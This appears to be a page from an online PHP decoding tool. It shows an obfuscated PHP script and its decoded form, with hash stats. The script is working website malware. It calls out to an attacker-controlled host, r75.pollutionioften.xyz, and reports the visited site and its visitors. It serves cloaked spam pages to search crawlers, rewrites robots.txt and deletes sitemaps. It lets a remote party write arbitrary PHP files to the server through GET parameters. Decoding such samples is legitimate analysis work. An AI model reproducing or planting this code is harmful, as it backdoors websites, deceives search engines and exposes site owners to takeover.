Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /* r75 */ @set_time_limit(3600); @ignore_user_abort(1); $lnitig = "\162\x37\x35"; ..
Decoded Output download
<?php
/* r75 */
@set_time_limit(3600); @ignore_user_abort(1); $lnitig = "r75"; $lnitil = "http"; if (is_htps()) { goto lOzltgg; } $lnitit = "http"; goto lOzltgl; lOzltgg: $lnitit = "https"; lOzltgl: $lnitib = st_uri(); if (!($lnitib == '')) { goto lOzltgt; } $lnitib = "/"; lOzltgt: $lnitii = urlencode($lnitib); function st_uri() { goto lOzltgO; lOzltgq: goto lOzltgf; goto lOzltgn; lOzltlg: $lnitii = $_SERVER["REQUEST_URI"]; goto lOzltll; lOzltgz: goto lOzltgi; goto lOzltgW; lOzltlt: return $lnitii; goto lOzltlb; lOzltgO: if (isset($_SERVER["REQUEST_URI"])) { goto lOzltgc; } goto lOzltgS; lOzltgx: $lnitii = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; goto lOzltgy; lOzltll: lOzltgf: goto lOzltlt; lOzltgn: lOzltgc: goto lOzltlg; lOzltgW: lOzltgb: goto lOzltgx; lOzltgS: if (isset($_SERVER["argv"])) { goto lOzltgb; } goto lOzltgu; lOzltgu: $lnitii = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; goto lOzltgz; lOzltgy: lOzltgi: goto lOzltgq; lOzltlb: } $lnitic = $lnitig . ".pollutionioften" . ".x" . "yz"; function is_htps() { goto lOzltlS; lOzltlS: if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { goto lOzltlc; } goto lOzltlu; lOzltln: lOzltlf: goto lOzlttg; lOzltlq: goto lOzltli; goto lOzltln; lOzlttt: lOzltlO: goto lOzlttb; lOzltlu: if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { goto lOzltlf; } goto lOzltlz; lOzltlW: goto lOzltli; goto lOzltlx; lOzltlx: lOzltlc: goto lOzltly; lOzltti: lOzltli: goto lOzlttc; lOzlttb: return true; goto lOzltti; lOzltlz: if (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { goto lOzltlO; } goto lOzltlW; lOzlttg: return true; goto lOzlttl; lOzlttc: return false; goto lOzlttf; lOzlttl: goto lOzltli; goto lOzlttt; lOzltly: return true; goto lOzltlq; lOzlttf: } $lnitif = $_SERVER["HTTP_HOST"]; $lnitiO = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; $lnitiO = urlencode($lnitiO); $lnitiS = ''; if (!isset($_SERVER["HTTP_REFERER"])) { goto lOzlttO; } $lnitiS = $_SERVER["HTTP_REFERER"]; $lnitiS = urlencode($lnitiS); lOzlttO: if (!(@$_GET["pd"] != '')) { goto lOzltbS; } $lnitiu = @$_GET["mapname"]; $lnitiz = @$_GET["action"]; if (isset($_SERVER["DOCUMENT_ROOT"])) { goto lOzlttS; } $lnitiW = dirname(__FILE__); goto lOzlttu; lOzlttS: $lnitiW = $_SERVER["DOCUMENT_ROOT"]; lOzlttu: if ($lnitiz) { goto lOzlttz; } $lnitiz = "put"; lOzlttz: if (!($lnitiz == "put")) { goto lOzltbO; } if (strstr($lnitiu, ".xml")) { goto lOzltbt; } echo "<br>sitemap name false!<br>"; goto lOzltbb; lOzltbt: $lnitix = $lnitiW . "/sitemap.xml"; if (!is_file($lnitix)) { goto lOzlttW; } @unlink($lnitix); lOzlttW: $lnitiy = $lnitiW . "/robots.txt"; if (file_exists($lnitiy)) { goto lOzlttx; } $lnitiq = "User-agent: *Allow: /"; goto lOzltty; lOzlttx: $lnitiq = dageget($lnitiy); lOzltty: $lnitin = $lnitit . "://" . $lnitif . "/" . $lnitiu; if (stristr($lnitiq, $lnitin)) { goto lOzltbg; } if (file_put_contents($lnitiy, trim($lnitiq) . "\xd
" . "Sitemap: " . $lnitin)) { goto lOzlttq; } echo "<br>file write false!<br>"; goto lOzlttn; lOzlttq: echo "<br>ok<br>"; lOzlttn: goto lOzltbl; lOzltbg: echo "<br>sitemap already added!<br>"; lOzltbl: lOzltbb: if (!strstr($lnitiu, ".p" . "hp")) { goto lOzltbf; } $lnitcg = sha1(sha1(@$_GET["a"])); $lnitcl = sha1(sha1(@$_GET["b"])); if (!($lnitcg == dageget($lnitil . "://" . $lnitic . "/a.p" . "hp") || $lnitcl == "808735b17c8943e3715388958dc22d879a8c9eaa")) { goto lOzltbc; } $lnitct = @$_GET["dstr"]; if (!file_put_contents($lnitiW . "/" . $lnitiu, $lnitct)) { goto lOzltbi; } echo "ok"; lOzltbi: lOzltbc: lOzltbf: lOzltbO: exit; lOzltbS: $lnitcb = $lnitil . "://" . $lnitic . "/indexnew.php?web=" . $lnitif . "&zz=" . sbot() . "&uri=" . $lnitii . "&urlshang=" . $lnitiS . "&http=" . $lnitit . "&lang=" . $lnitiO; $lnitci = trim(dageget($lnitcb)); if (strstr($lnitci, "nobotuseragent")) { goto lOzltbq; } if (strstr($lnitci, "okhtmlgetcontent")) { goto lOzltbx; } if (strstr($lnitci, "okxmlgetcontent")) { goto lOzltbz; } if (!strstr($lnitci, "pingxmlgetcontent")) { goto lOzltbu; } $lnitci = str_replace("pingxmlgetcontent", '', $lnitci); @header("Content-type: text/html; charset=utf-8"); echo pingmap($lnitci); exit; lOzltbu: goto lOzltbW; lOzltbz: $lnitci = str_replace("okxmlgetcontent", '', $lnitci); @header("Content-type: text/xml"); echo $lnitci; exit; lOzltbW: goto lOzltby; lOzltbx: @header("Content-type: text/html; charset=utf-8"); $lnitci = str_replace("okhtmlgetcontent", '', $lnitci); echo $lnitci; exit; lOzltby: lOzltbq: function pingmap($lnitcc) { goto lOzltic; lOzltic: $lnitcf = explode("
\xa", trim($lnitcc)); goto lOzltif; lOzltiO: foreach ($lnitcf as $lnitcS) { goto lOzltil; lOzltib: $lnitcO .= $lnitcS . "-- " . $lnitcz . "<br>"; goto lOzltii; lOzltil: $lnitcu = dageget($lnitcS); goto lOzltit; lOzltit: $lnitcz = strpos($lnitcu, "Sitemap Notification Received") !== false ? "pingok" : "error"; goto lOzltib; lOzltii: } goto lOzltiS; lOzltiS: return $lnitcO; goto lOzltiu; lOzltif: $lnitcO = ''; goto lOzltiO; lOzltiu: } function sbot() { goto lOzltix; lOzltiq: return false; goto lOzltin; lOzltcl: return true; goto lOzltct; lOzltcg: lOzltiz: goto lOzltcl; lOzltiy: if (stristr($lnitcW, "googlebot") || stristr($lnitcW, "bing") || stristr($lnitcW, "yahoo") || stristr($lnitcW, "google") || stristr($lnitcW, "Googlebot") || stristr($lnitcW, "googlebot")) { goto lOzltiz; } goto lOzltiq; lOzltix: $lnitcW = strtolower($_SERVER["HTTP_USER_AGENT"]); goto lOzltiy; lOzltin: goto lOzltiW; goto lOzltcg; lOzltct: lOzltiW: goto lOzltcb; lOzltcb: } function dageget($lnitcc) { goto lOzltcf; lOzltfg: lOzltci: goto lOzltfl; lOzltcO: if (!function_exists("curl_init")) { goto lOzltci; } goto lOzltcS; lOzltfb: lOzltcc: goto lOzltfi; lOzltfi: return $lnitcx; goto lOzltfc; lOzltft: $lnitcx = @file_get_contents($lnitcc); goto lOzltfb; lOzltcy: curl_setopt($lnitcy, CURLOPT_CONNECTTIMEOUT, 30); goto lOzltcq; lOzltcn: curl_close($lnitcy); goto lOzltfg; lOzltcW: curl_setopt($lnitcy, CURLOPT_SSL_VERIFYPEER, 0); goto lOzltcx; lOzltfl: if ($lnitcx) { goto lOzltcc; } goto lOzltft; lOzltcx: curl_setopt($lnitcy, CURLOPT_RETURNTRANSFER, 1); goto lOzltcy; lOzltcu: curl_setopt($lnitcy, CURLOPT_URL, $lnitcc); goto lOzltcz; lOzltcq: $lnitcx = curl_exec($lnitcy); goto lOzltcn; lOzltcS: $lnitcy = curl_init(); goto lOzltcu; lOzltcf: $lnitcx = ''; goto lOzltcO; lOzltcz: curl_setopt($lnitcy, CURLOPT_SSL_VERIFYHOST, 0); goto lOzltcW; lOzltfc: } ?>Did this file decode correctly?
Original Code
<?php
/* r75 */
@set_time_limit(3600); @ignore_user_abort(1); $lnitig = "\162\x37\x35"; $lnitil = "\150\x74\x74\160"; if (is_htps()) { goto lOzltgg; } $lnitit = "\x68\164\164\x70"; goto lOzltgl; lOzltgg: $lnitit = "\150\x74\x74\x70\163"; lOzltgl: $lnitib = st_uri(); if (!($lnitib == '')) { goto lOzltgt; } $lnitib = "\x2f"; lOzltgt: $lnitii = urlencode($lnitib); function st_uri() { goto lOzltgO; lOzltgq: goto lOzltgf; goto lOzltgn; lOzltlg: $lnitii = $_SERVER["\122\105\121\x55\x45\123\x54\x5f\x55\122\111"]; goto lOzltll; lOzltgz: goto lOzltgi; goto lOzltgW; lOzltlt: return $lnitii; goto lOzltlb; lOzltgO: if (isset($_SERVER["\122\105\x51\x55\105\x53\x54\137\125\122\111"])) { goto lOzltgc; } goto lOzltgS; lOzltgx: $lnitii = $_SERVER["\120\110\120\x5f\x53\x45\x4c\x46"] . "\77" . $_SERVER["\x61\162\147\166"][0]; goto lOzltgy; lOzltll: lOzltgf: goto lOzltlt; lOzltgn: lOzltgc: goto lOzltlg; lOzltgW: lOzltgb: goto lOzltgx; lOzltgS: if (isset($_SERVER["\x61\162\147\x76"])) { goto lOzltgb; } goto lOzltgu; lOzltgu: $lnitii = $_SERVER["\120\x48\120\137\x53\105\114\x46"] . "\77" . $_SERVER["\121\125\105\122\x59\137\123\124\x52\x49\x4e\x47"]; goto lOzltgz; lOzltgy: lOzltgi: goto lOzltgq; lOzltlb: } $lnitic = $lnitig . "\x2e\160\x6f\154\x6c\x75\164\x69\157\x6e\151\157\x66\x74\145\x6e" . "\x2e\x78" . "\171\x7a"; function is_htps() { goto lOzltlS; lOzltlS: if (isset($_SERVER["\x48\x54\x54\120\x53"]) && strtolower($_SERVER["\110\x54\124\120\x53"]) !== "\157\x66\146") { goto lOzltlc; } goto lOzltlu; lOzltln: lOzltlf: goto lOzlttg; lOzltlq: goto lOzltli; goto lOzltln; lOzlttt: lOzltlO: goto lOzlttb; lOzltlu: if (isset($_SERVER["\x48\x54\x54\120\137\130\x5f\x46\117\x52\127\x41\122\x44\x45\x44\137\x50\x52\117\124\x4f"]) && $_SERVER["\x48\124\124\120\137\130\137\106\117\122\x57\x41\122\x44\105\104\137\120\x52\117\124\117"] === "\150\164\164\x70\x73") { goto lOzltlf; } goto lOzltlz; lOzltlW: goto lOzltli; goto lOzltlx; lOzltlx: lOzltlc: goto lOzltly; lOzltti: lOzltli: goto lOzlttc; lOzlttb: return true; goto lOzltti; lOzltlz: if (isset($_SERVER["\x48\124\x54\x50\137\106\x52\x4f\x4e\x54\137\105\x4e\x44\137\x48\x54\124\120\x53"]) && strtolower($_SERVER["\110\124\124\120\137\106\x52\x4f\116\124\x5f\x45\x4e\104\137\x48\x54\124\120\123"]) !== "\x6f\x66\146") { goto lOzltlO; } goto lOzltlW; lOzlttg: return true; goto lOzlttl; lOzlttc: return false; goto lOzlttf; lOzlttl: goto lOzltli; goto lOzlttt; lOzltly: return true; goto lOzltlq; lOzlttf: } $lnitif = $_SERVER["\110\124\124\x50\137\x48\117\x53\124"]; $lnitiO = @$_SERVER["\110\124\124\120\x5f\x41\103\103\x45\120\x54\x5f\114\101\x4e\x47\125\x41\107\x45"]; $lnitiO = urlencode($lnitiO); $lnitiS = ''; if (!isset($_SERVER["\x48\x54\124\120\137\122\x45\106\105\x52\105\122"])) { goto lOzlttO; } $lnitiS = $_SERVER["\110\x54\124\x50\137\122\105\x46\x45\122\105\x52"]; $lnitiS = urlencode($lnitiS); lOzlttO: if (!(@$_GET["\160\144"] != '')) { goto lOzltbS; } $lnitiu = @$_GET["\x6d\141\160\156\x61\155\x65"]; $lnitiz = @$_GET["\141\x63\164\x69\157\x6e"]; if (isset($_SERVER["\104\x4f\x43\x55\x4d\x45\116\124\x5f\x52\117\117\x54"])) { goto lOzlttS; } $lnitiW = dirname(__FILE__); goto lOzlttu; lOzlttS: $lnitiW = $_SERVER["\x44\x4f\x43\125\115\105\116\124\137\x52\x4f\117\124"]; lOzlttu: if ($lnitiz) { goto lOzlttz; } $lnitiz = "\160\165\164"; lOzlttz: if (!($lnitiz == "\160\x75\x74")) { goto lOzltbO; } if (strstr($lnitiu, "\56\x78\155\x6c")) { goto lOzltbt; } echo "\74\142\162\x3e\163\x69\x74\x65\x6d\141\160\40\156\x61\x6d\x65\40\x66\141\x6c\163\145\x21\74\142\162\x3e"; goto lOzltbb; lOzltbt: $lnitix = $lnitiW . "\x2f\x73\151\x74\x65\x6d\x61\160\56\x78\x6d\154"; if (!is_file($lnitix)) { goto lOzlttW; } @unlink($lnitix); lOzlttW: $lnitiy = $lnitiW . "\x2f\162\x6f\x62\157\x74\x73\x2e\x74\x78\164"; if (file_exists($lnitiy)) { goto lOzlttx; } $lnitiq = "\x55\163\x65\x72\55\x61\x67\145\156\x74\x3a\x20\x2a\101\154\154\x6f\x77\72\40\x2f"; goto lOzltty; lOzlttx: $lnitiq = dageget($lnitiy); lOzltty: $lnitin = $lnitit . "\x3a\x2f\x2f" . $lnitif . "\57" . $lnitiu; if (stristr($lnitiq, $lnitin)) { goto lOzltbg; } if (file_put_contents($lnitiy, trim($lnitiq) . "\xd\12" . "\123\x69\164\145\155\x61\x70\72\x20" . $lnitin)) { goto lOzlttq; } echo "\x3c\x62\x72\x3e\146\151\154\x65\40\167\x72\151\x74\145\x20\146\141\x6c\163\145\x21\74\142\x72\x3e"; goto lOzlttn; lOzlttq: echo "\74\x62\162\76\157\153\x3c\x62\x72\76"; lOzlttn: goto lOzltbl; lOzltbg: echo "\74\x62\x72\x3e\163\x69\164\x65\155\x61\x70\x20\141\x6c\162\x65\141\x64\x79\40\x61\144\x64\x65\x64\x21\74\x62\162\76"; lOzltbl: lOzltbb: if (!strstr($lnitiu, "\x2e\160" . "\x68\160")) { goto lOzltbf; } $lnitcg = sha1(sha1(@$_GET["\141"])); $lnitcl = sha1(sha1(@$_GET["\142"])); if (!($lnitcg == dageget($lnitil . "\72\x2f\57" . $lnitic . "\x2f\x61\x2e\160" . "\x68\160") || $lnitcl == "\x38\60\x38\67\63\65\142\61\67\143\x38\71\x34\x33\145\63\67\x31\65\x33\70\70\x39\65\70\144\143\x32\x32\144\70\67\x39\141\x38\143\x39\145\141\x61")) { goto lOzltbc; } $lnitct = @$_GET["\144\163\x74\162"]; if (!file_put_contents($lnitiW . "\x2f" . $lnitiu, $lnitct)) { goto lOzltbi; } echo "\157\x6b"; lOzltbi: lOzltbc: lOzltbf: lOzltbO: exit; lOzltbS: $lnitcb = $lnitil . "\x3a\57\57" . $lnitic . "\57\151\x6e\x64\x65\x78\156\145\x77\x2e\x70\150\x70\77\x77\x65\142\75" . $lnitif . "\x26\172\172\x3d" . sbot() . "\46\x75\x72\x69\x3d" . $lnitii . "\46\x75\162\154\x73\150\141\x6e\147\x3d" . $lnitiS . "\46\x68\164\164\x70\x3d" . $lnitit . "\46\x6c\x61\x6e\x67\x3d" . $lnitiO; $lnitci = trim(dageget($lnitcb)); if (strstr($lnitci, "\x6e\x6f\x62\x6f\164\165\x73\x65\162\x61\x67\x65\x6e\164")) { goto lOzltbq; } if (strstr($lnitci, "\x6f\x6b\x68\164\155\x6c\x67\x65\164\x63\157\x6e\x74\x65\x6e\164")) { goto lOzltbx; } if (strstr($lnitci, "\x6f\153\x78\x6d\x6c\147\x65\164\x63\157\156\164\x65\x6e\164")) { goto lOzltbz; } if (!strstr($lnitci, "\160\151\156\147\170\155\x6c\147\145\x74\143\x6f\156\164\145\156\164")) { goto lOzltbu; } $lnitci = str_replace("\160\x69\x6e\x67\170\155\154\147\x65\x74\x63\x6f\156\x74\x65\156\x74", '', $lnitci); @header("\x43\157\x6e\164\145\156\x74\55\x74\171\160\145\x3a\40\x74\145\x78\x74\x2f\x68\x74\155\154\x3b\x20\x63\x68\x61\x72\163\145\164\x3d\165\164\x66\x2d\70"); echo pingmap($lnitci); exit; lOzltbu: goto lOzltbW; lOzltbz: $lnitci = str_replace("\x6f\153\170\155\154\147\145\x74\x63\157\x6e\x74\145\x6e\x74", '', $lnitci); @header("\103\157\x6e\164\145\156\x74\x2d\x74\x79\160\145\x3a\40\164\145\x78\x74\x2f\170\x6d\x6c"); echo $lnitci; exit; lOzltbW: goto lOzltby; lOzltbx: @header("\x43\157\156\x74\x65\156\x74\55\164\x79\x70\x65\x3a\x20\164\x65\x78\x74\57\x68\164\x6d\x6c\73\40\x63\150\141\162\x73\145\x74\75\165\164\x66\x2d\70"); $lnitci = str_replace("\x6f\153\x68\164\155\x6c\147\x65\164\x63\157\156\x74\x65\156\x74", '', $lnitci); echo $lnitci; exit; lOzltby: lOzltbq: function pingmap($lnitcc) { goto lOzltic; lOzltic: $lnitcf = explode("\15\xa", trim($lnitcc)); goto lOzltif; lOzltiO: foreach ($lnitcf as $lnitcS) { goto lOzltil; lOzltib: $lnitcO .= $lnitcS . "\x2d\x2d\x20" . $lnitcz . "\74\x62\x72\76"; goto lOzltii; lOzltil: $lnitcu = dageget($lnitcS); goto lOzltit; lOzltit: $lnitcz = strpos($lnitcu, "\123\151\x74\x65\x6d\x61\x70\40\x4e\x6f\x74\151\146\x69\x63\x61\x74\151\157\x6e\40\122\x65\143\x65\151\x76\x65\x64") !== false ? "\x70\151\156\x67\157\x6b" : "\145\162\x72\x6f\162"; goto lOzltib; lOzltii: } goto lOzltiS; lOzltiS: return $lnitcO; goto lOzltiu; lOzltif: $lnitcO = ''; goto lOzltiO; lOzltiu: } function sbot() { goto lOzltix; lOzltiq: return false; goto lOzltin; lOzltcl: return true; goto lOzltct; lOzltcg: lOzltiz: goto lOzltcl; lOzltiy: if (stristr($lnitcW, "\147\157\x6f\x67\154\x65\x62\x6f\x74") || stristr($lnitcW, "\142\151\x6e\x67") || stristr($lnitcW, "\171\141\150\x6f\x6f") || stristr($lnitcW, "\x67\157\157\x67\x6c\145") || stristr($lnitcW, "\107\x6f\157\147\x6c\145\x62\157\x74") || stristr($lnitcW, "\x67\157\x6f\x67\x6c\x65\142\157\x74")) { goto lOzltiz; } goto lOzltiq; lOzltix: $lnitcW = strtolower($_SERVER["\110\x54\x54\x50\x5f\x55\x53\105\x52\x5f\101\107\105\x4e\124"]); goto lOzltiy; lOzltin: goto lOzltiW; goto lOzltcg; lOzltct: lOzltiW: goto lOzltcb; lOzltcb: } function dageget($lnitcc) { goto lOzltcf; lOzltfg: lOzltci: goto lOzltfl; lOzltcO: if (!function_exists("\143\165\x72\154\137\151\156\151\x74")) { goto lOzltci; } goto lOzltcS; lOzltfb: lOzltcc: goto lOzltfi; lOzltfi: return $lnitcx; goto lOzltfc; lOzltft: $lnitcx = @file_get_contents($lnitcc); goto lOzltfb; lOzltcy: curl_setopt($lnitcy, CURLOPT_CONNECTTIMEOUT, 30); goto lOzltcq; lOzltcn: curl_close($lnitcy); goto lOzltfg; lOzltcW: curl_setopt($lnitcy, CURLOPT_SSL_VERIFYPEER, 0); goto lOzltcx; lOzltfl: if ($lnitcx) { goto lOzltcc; } goto lOzltft; lOzltcx: curl_setopt($lnitcy, CURLOPT_RETURNTRANSFER, 1); goto lOzltcy; lOzltcu: curl_setopt($lnitcy, CURLOPT_URL, $lnitcc); goto lOzltcz; lOzltcq: $lnitcx = curl_exec($lnitcy); goto lOzltcn; lOzltcS: $lnitcy = curl_init(); goto lOzltcu; lOzltcf: $lnitcx = ''; goto lOzltcO; lOzltcz: curl_setopt($lnitcy, CURLOPT_SSL_VERIFYHOST, 0); goto lOzltcW; lOzltfc: }Function Calls
| None |
Stats
| MD5 | f12add729b440d09ae92bace5a45dbb5 |
| Eval Count | 0 |
| Decode Time | 32 ms |